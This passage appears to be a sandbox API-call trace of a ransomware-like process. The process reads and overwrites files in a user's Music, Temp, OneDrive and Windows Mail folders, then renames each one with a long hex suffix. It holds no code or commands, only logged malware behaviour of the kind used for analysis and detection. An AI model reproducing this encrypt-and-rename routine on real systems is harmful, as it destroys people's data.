lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0160.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.572] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74723c8, ReturnLength=0x702fa7c) returned 0x0 [0160.573] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll", lpString2=".CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll.CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll.CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842" [0160.573] GetProcessHeap () returned 0x270000 [0160.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x172) returned 0x427ab78 [0160.573] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x702fa6c, FileInformation=0x427ab78, Length=0x172, FileInformationClass=0xa) returned 0x0 [0160.921] CloseHandle (hObject=0x5b4) returned 1 [0161.005] GetProcessHeap () returned 0x270000 [0161.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0161.016] RtlInterlockedCompareExchange64 () returned 0x5 [0161.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0163.958] ReadFile (in: hFile=0x5ac, lpBuffer=0x752a2a8, 
nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0163.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0163.963] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74723c8, ReturnLength=0x702fa7c) returned 0x0 [0163.964] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", lpString2=".3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45" [0163.964] GetProcessHeap () returned 0x270000 [0163.964] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421220 [0163.964] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x702fa6c, FileInformation=0x7421220, Length=0x162, FileInformationClass=0xa) returned 0x0 [0163.981] CloseHandle (hObject=0x5b0) returned 1 [0163.984] GetProcessHeap () returned 0x270000 [0163.986] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0163.988] RtlInterlockedCompareExchange64 () returned 0x2 [0163.988] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, 
lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0164.416] ReadFile (in: hFile=0x590, lpBuffer=0x7610188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050) returned 1 [0164.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0164.417] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x75aa780, ReturnLength=0x702fa7c) returned 0x0 [0164.418] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png", lpString2=".D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png.D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png.D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12" [0164.418] GetProcessHeap () returned 0x270000 [0164.418] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425cf28 [0164.418] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x702fa6c, FileInformation=0x425cf28, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.420] CloseHandle (hObject=0x5c0) returned 1 [0164.425] GetProcessHeap () returned 0x270000 [0164.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0164.682] RtlInterlockedCompareExchange64 () returned 0x6 [0164.682] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0165.976] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0165.978] RtlInterlockedCompareExchange64 () returned 0x2 [0165.978] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.866] ReadFile (in: hFile=0x5e4, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0167.870] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.871] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7422118, ReturnLength=0x702fa7c) returned 0x0 [0167.872] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3", lpString2=".DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3.DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3.DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18" [0167.873] GetProcessHeap () returned 0x270000 [0167.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263820 [0167.873] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263820, Length=0x136, FileInformationClass=0xa) returned 0x0 [0167.878] CloseHandle (hObject=0x5e4) returned 1 [0167.879] GetProcessHeap () returned 0x270000 [0167.881] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0167.883] RtlInterlockedCompareExchange64 () returned 0x1 [0167.883] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.889] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.889] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.892] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.893] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3", lpString2=".D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3.D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3.D44A42FBD5972F4A63A3B5DA57559D87B2AFF59CADEA72037A9751747A2FE043" [0167.893] GetProcessHeap () returned 0x270000 [0167.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4257c08 [0167.893] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4257c08, Length=0x144, FileInformationClass=0xa) returned 0x0 [0167.894] CloseHandle (hObject=0x5e4) returned 1 [0167.896] GetProcessHeap () returned 0x270000 [0167.897] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.906] RtlInterlockedCompareExchange64 () returned 0x1 [0167.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.912] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.912] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.913] RtlInterlockedCompareExchange64 () returned 0x0 [0167.914] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.924] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.925] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a", lpString2=".700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a.700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a.700BCBA1E73F11DE27584C0AF1A4249F415C7AB9125D227F15433BA4DA5B3F2C" [0167.925] GetProcessHeap () returned 0x270000 [0167.925] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4257d60 [0167.925] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4257d60, Length=0x144, FileInformationClass=0xa) returned 0x0 [0167.927] CloseHandle (hObject=0x5e4) returned 1 [0167.928] GetProcessHeap () returned 0x270000 [0167.929] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.929] RtlInterlockedCompareExchange64 () returned 0x1 [0167.929] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.934] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.949] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.951] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.952] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3", lpString2=".C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3.C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3.C199483797C9FD46CBAE9EF131776B855AF73A4819828B7C0BF3F11BD19C366D" [0167.952] GetProcessHeap () returned 0x270000 [0167.952] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263ab0 [0167.953] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263ab0, Length=0x136, FileInformationClass=0xa) returned 0x0 [0167.954] CloseHandle (hObject=0x5e4) returned 1 [0167.955] GetProcessHeap () returned 0x270000 [0167.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.957] RtlInterlockedCompareExchange64 () returned 0x1 [0167.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, 
lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.967] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.969] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.971] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.972] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3", lpString2=".4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3.4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3.4C6FFEF6599AA21194C4F3C57F0FB72411D9EE0BBF68F9059A0F520E2B093C2F" [0167.972] GetProcessHeap () returned 0x270000 [0167.972] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x4332578 [0167.972] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x4332578, Length=0x124, FileInformationClass=0xa) returned 0x0 [0167.973] CloseHandle (hObject=0x5a4) returned 1 [0167.974] GetProcessHeap () returned 0x270000 [0167.977] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.981] RtlInterlockedCompareExchange64 () returned 0x1 [0167.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, 
lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.989] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.990] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.992] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0167.994] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a", lpString2=".F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a.F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a.F54379A27319F6759C0234F47EB9A7F93B214F7CC002A143655D653EC086531A" [0167.994] GetProcessHeap () returned 0x270000 [0167.994] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f9c28 [0167.994] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x42f9c28, Length=0x114, FileInformationClass=0xa) returned 0x0 [0167.996] CloseHandle (hObject=0x5a4) returned 1 [0167.997] GetProcessHeap () returned 0x270000 [0167.999] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.999] RtlInterlockedCompareExchange64 () returned 0x1 [0167.999] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.009] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.011] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.013] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a", lpString2=".81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a.81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a.81610B17E7A0617FC44F2C97F421C0B577396E6E3E827D4087054F18F9A4E216" [0168.013] GetProcessHeap () returned 0x270000 [0168.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb898 [0168.014] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x42fb898, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.016] CloseHandle (hObject=0x5e4) returned 1 [0168.019] GetProcessHeap () returned 0x270000 [0168.020] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.021] RtlInterlockedCompareExchange64 () returned 0x1 [0168.021] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.027] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.035] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.036] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3", lpString2=".0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3.0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3.0D7D850551BE57002019E888857EDF8AE7DEED56D109379D7B9B8DDEAD3E5E0A" [0168.036] GetProcessHeap () returned 0x270000 [0168.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263bf8 [0168.037] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263bf8, Length=0x136, FileInformationClass=0xa) returned 
0x0 [0168.038] CloseHandle (hObject=0x5e4) returned 1 [0168.041] GetProcessHeap () returned 0x270000 [0168.043] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.043] RtlInterlockedCompareExchange64 () returned 0x1 [0168.043] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.047] ReadFile (in: hFile=0x5e4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.047] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, 